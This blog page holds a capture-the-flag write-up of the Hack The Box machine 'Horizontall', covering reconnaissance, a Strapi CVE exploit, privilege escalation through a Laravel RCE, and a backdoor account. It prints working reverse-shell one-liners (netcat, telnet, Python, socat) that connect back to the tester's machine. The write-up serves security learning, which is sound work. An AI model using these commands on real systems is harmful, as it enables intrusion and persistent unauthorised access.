<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!--Description-->
    
        <meta name="description" content="# Hackthebox Play - Horizontall
1. Environment setupDownload VPN setting config from Hackthebox, import it in Kali VM. Then edit /etc/hosts, add a new">
    

    <!--Author-->
    
        <meta name="author" content="Ulysses">
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="Secfilter"/>
    

    <!--Open Graph Description-->
    

    <!--Open Graph Site Name-->
    <meta property="og:site_name" content="Secfilter"/>

    <!--Type page-->
    
        <meta property="og:type" content="website" />
    

    <!--Page Cover-->
    

    
        <meta name="twitter:card" content="summary" />
    
    
    

    <!-- Title -->
    
    <title>Secfilter</title>

    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.2/css/bootstrap.min.css" integrity="sha384-y3tfxAZXuh4HwSYylfB+J125MxIs6mR5FOHamPBG064zB+AFeWH94NdvaCBm8qnd" crossorigin="anonymous">

    <!-- Custom Fonts -->
    <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- Gallery -->
    <link href="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.css" type="text/css" rel="stylesheet" />

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/style.css">


    <!-- Google Analytics -->
    


<meta name="generator" content="Hexo 5.4.0"></head>


<body>

<div class="bg-gradient"></div>
<div class="bg-pattern"></div>

<!-- Menu -->
<!--Menu Links and Overlay-->
<div class="menu-bg">
    <div class="menu-container">
        <ul>
            
            <li class="menu-item">
                <a href="/">
                    Home
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/archives">
                    Archives
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/about.html">
                    About
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/tags">
                    Tags
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/categories">
                    Categories
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/contact.html">
                    Contact
                </a>
            </li>
            
        </ul>
    </div>
</div>

<!--Hamburger Icon-->
<nav>
    <a href="#menu"></a>
</nav>

<div class="container">

    <!-- Main Content -->
    <div class="row">
    <div class="col-sm-12">

        <!--Title and Logo-->
        <header>
    <div class="logo">
        <a href="/"><i class="logo-icon fa fa-cube" aria-hidden="true"></i></a>
        
    </div>
</header>

        <section class="main">
            
<div class="post">

    <div class="post-header">
        <h1 class="title">
            <a href="/2022/01/01/Hackthebox-Play-Horizontall/">
                Untitled
            </a>
        </h1>
        <div class="post-info">
            
                <span class="date">2022-01-01</span>
            
            
            
        </div>
    </div>

    <div class="content">

        <!-- Gallery -->
        

        <!-- Post Content -->
        <p>﻿# Hackthebox Play - Horizontall</p>
<h3 id="1-Environment-setup"><a href="#1-Environment-setup" class="headerlink" title="1. Environment setup"></a>1. Environment setup</h3><p>Download VPN setting config from Hackthebox, import it in Kali VM. Then edit /etc/hosts, add a new line “10.10.11.105    horizontall.htb” to for domain resolution.</p>
<h3 id="2-Reconnaissance"><a href="#2-Reconnaissance" class="headerlink" title="2. Reconnaissance"></a>2. Reconnaissance</h3><p>Visit website horizontall.htb in firefox. There is not too much information, no login page or others to exploit. In the bottom,  there is a input box to send email, it seems a start point to work on. Start Burp to set a proxy the traffic, unfortunately, no traffic captured after click the send button, it seems to be a fake button.  </p>
<p>Check the source code of the horizontall.htb, found subdomain “api-prod” in one of the javascript file. </p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211229114912328.png" alt="image-20211229114912328"></p>
<p>Use nmap to scan the server(10.10.11.105), only port 22 and 80 are open, seems pretty normal</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sS -A 10.10.11.105</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211229115403881.png" alt="image-20211229115403881"></p>
<p>Next, try some tools to do the path discovery. I prefer to use wfuzz. Download lists from Seclist</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/danielmiessler/SecLists.git</span><br></pre></td></tr></table></figure>

<p>Then start path bruteforce for both “horizontall.htb” and “api-prod.horizontall.htb”</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">wfuzz -w ./SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt --hc 404 http://horizontall.htb/FUZZ</span><br><span class="line">wfuzz -w ./SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt --hc 404 http://api-prod.horizontall.htb/FUZZ</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211229203037133.png" alt="image-20211229203037133"></p>
<p>Also don’t forget to bruteforce for subdomain of “horizontall.htb”, as I have got something to work on, I will not do subdomain discovery anymore. It looks the “Admin” path is juicy. </p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211230104444561.png" alt="image-20211230104444561"></p>
<p>Besides wfuzz, There are many other tools I could use, such as <a target="_blank" rel="noopener" href="https://sourceforge.net/projects/dirbuster/">DirBuster</a> for path discovery, Sublist3r and amass for subdomain discovery.</p>
<h3 id="3-Exploit"><a href="#3-Exploit" class="headerlink" title="3. Exploit"></a>3. Exploit</h3><p>The first step is to use sqlmap scan sql injection vulnerablility.</p>
<p>In the request of login, find the version of the platform “strapiVersion”:”3.0.0-beta.17.4”, google it to see if there is any exploit related to the platform. Find vulnerability CVE-2019-18818, CVE-2019-19609 could work on this platform. </p>
<p>Download the exploit code (<a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/50239">https://www.exploit-db.com/exploits/50239</a>) and run it, it works very well, I could login in the website with admin and I could get a shell now!</p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211230113146525.png" alt="image-20211230113146525"></p>
<h3 id="4-Shell-connection"><a href="#4-Shell-connection" class="headerlink" title="4. Shell connection"></a>4. Shell connection</h3><p>It is a blind shell, so I need to get a reverse shell at first. Save the post request in Burp to file “post_request.txt”.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -r post_request.txt --level=3 --risk=2</span><br></pre></td></tr></table></figure>

<p>Start netcat to listen on port 4444 in my Kali VM. In the shell get from exploit, use netcat to build a shell.</p>
<p>nc -e /bin/bash 10.10.14.96 4444</p>
<p>Unfortunately, it failed, I could not get any connection in Kail VM. Try telnet “telnet 10.10.14.96 4444” to test the connection, telnet works well. Open two netcat to receive connection in Kali.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># In Kali</span><br><span class="line">nc -nlvp 4444</span><br><span class="line">nc -nlvp 5555</span><br><span class="line"></span><br><span class="line"># In exploit shell</span><br><span class="line">telnet 10.10.14.96 5555 | /bin/bash | telnet 10.10.14.96 4444</span><br></pre></td></tr></table></figure>

<p>The shell will accept input from 10.10.14.96 5555 and print output to 10.10.14.96 4444. </p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211230115019612.png" alt="image-20211230115019612"></p>
<p>Finally, get a shell could work on the exploit server, although not very convenient. It would be better to have a normal shell. Start a python reverse shell as below, then I could get a normal shell.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># In kali VM</span><br><span class="line">nc -nlvp 6666</span><br><span class="line"></span><br><span class="line"># In exploit shell</span><br><span class="line">python -c &#x27;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.14.96&quot;,6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/bash&quot;,&quot;-i&quot;]);&#x27;</span><br></pre></td></tr></table></figure>



<h3 id="5-privilege-Escalation"><a href="#5-privilege-Escalation" class="headerlink" title="5. privilege Escalation"></a>5. privilege Escalation</h3><p>Run some command to check the current status.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">whoami</span><br><span class="line">netstat -antp</span><br><span class="line">ps aux</span><br><span class="line">find / -writable</span><br></pre></td></tr></table></figure>

<p>Or upload linpeas to the exploit server, and let linpeas to collect some information.</p>
<p>According to the information collected, there are three interesting thing to dig into.</p>
<p>There are use name and password for mysql databases in databases.json.</p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211231114344295.png" alt="image-20211231114344295"></p>
<p>Unfortunately, it hanged when I try to login in mysql with the username and password.</p>
<p>There seems to be a Laravel running in 127.0.0.1:8000</p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211231114822996.png" alt="image-20211231114822996"></p>
<p>As I could not access <a target="_blank" rel="noopener" href="http://127.0.0.1:8000/">http://127.0.0.1:8000</a> from browser, I use “socat” to listen on port 10000 and forward the traffic 127.0.0.1:8000. “socat” is not in the exploit server, I need to download a socat from my kali VM.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"># In Kali VM</span><br><span class="line">nc 10.10.11.105 8888 &lt; socat</span><br><span class="line"></span><br><span class="line"># In exploit server</span><br><span class="line">nc -nlvp 8888 &gt; socat</span><br><span class="line">chmod +x socat</span><br><span class="line">nohup ./socat TCP4-LISTEN:10000,reuseaddr,fork TCP4:127.0.0.1:8000 &amp;</span><br></pre></td></tr></table></figure>

<p>Now, I could access the Laravel portal.</p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211231183235920.png" alt="image-20211231183235920"></p>
<p>Google if there is any vulnerability related to Laravel v7.4.18 to exploit. Luckily, I found CVE-2021-3129, which is a RCE exploit. Details about the vulnerability could be found here. (<a target="_blank" rel="noopener" href="https://www.ambionics.io/blog/laravel-debug-rce">https://www.ambionics.io/blog/laravel-debug-rce</a>). </p>
<p>As the exploit server didn’t install requests python library and I don’t root privilege to install it with pip. I run the exploit script in Kali VM.  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># In Kali VM</span><br><span class="line">nc -nlvp 9999</span><br><span class="line">python3 CVE-2021-3129.py http://10.10.11.105:10000 Monolog/RCE1 &quot;whoami&quot;</span><br><span class="line">python3 CVE-2021-3129.py http://10.10.11.105:10000 Monolog/RCE1 &quot;/opt/strapi/myapi/socat TCP4:10.10.14.10:9999 EXEC:/bin/bash&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211231185519553.png" alt="image-20211231185519553"></p>
<p>The exploit code works very well, I could get the root privilege. </p>
<p><img src="https://raw.githubusercontent.com/ulysses425/blog_images/main/image-20211231185623186.png" alt="image-20211231185623186"></p>
<p>One issue is that the shell connection will be lost in a few seconds, I guess it is the timeout of http connection. So I use the command below to add a user to the system. Then use ssh to connect to the exploit server.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">useradd -p `openssl passwd 123456` guest</span><br></pre></td></tr></table></figure>








    </div>

    

    

    <!-- Comments -->
    

</div>
        </section>

    </div>
</div>


</div>

<!-- Footer -->
<div class="push"></div>

<footer class="footer-content">
    <div class="container">
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-6 col-lg-6 footer-about">
                <h2>About</h2>
                <p>
                    
                </p>
            </div>
            
    <div class="col-xs-6 col-sm-6 col-md-3 col-lg-3 recent-posts">
        <h2>Recent Posts</h2>
        <ul>
            
            <li>
                <a class="footer-post" href="/2022/01/01/Hackthebox-Play-Horizontall/">Untitled</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2021/12/26/Domain-Fronting-and-Domain-Hiding/">Domain Fronting and Domai</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2021/12/26/First-Day-at-Hackthebox/">First Day at Hackthebox</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2021/12/19/hello-world/">Hello World</a>
            </li>
            
        </ul>
    </div>



            
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <ul class="list-inline footer-social-icons">
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://github.com/klugjo/hexo-theme-alpha-dust">
                            <span class="footer-icon-container">
                                <i class="fa fa-github"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://twitter.com/?lang=en">
                            <span class="footer-icon-container">
                                <i class="fa fa-twitter"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.facebook.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-facebook"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.instagram.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-instagram"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://dribbble.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-dribbble"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://telegram.org/">
                            <span class="footer-icon-container">
                                <i class="fa fa-telegram"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.behance.net/">
                            <span class="footer-icon-container">
                                <i class="fa fa-behance"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://500px.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-500px"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="mailto:test@example.com">
                            <span class="footer-icon-container">
                                <i class="fa fa-envelope-o"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="\#">
                            <span class="footer-icon-container">
                                <i class="fa fa-rss"></i>
                            </span>
                        </a>
                    </li>
                    
                </ul>
            </div>
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <div class="footer-copyright">
                    
                </div>
            </div>
        </div>
    </div>
</footer>

<!-- After footer scripts -->

<!-- jQuery -->
<script src="//code.jquery.com/jquery-2.1.4.min.js"></script>

<!-- Tween Max -->
<script src="//cdnjs.cloudflare.com/ajax/libs/gsap/1.18.5/TweenMax.min.js"></script>

<!-- Gallery -->
<script src="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.js" type="text/javascript" charset="utf-8"></script>

<!-- Custom JavaScript -->

<script src="/js/main.js"></script>


<!-- Disqus Comments -->



</body>

</html>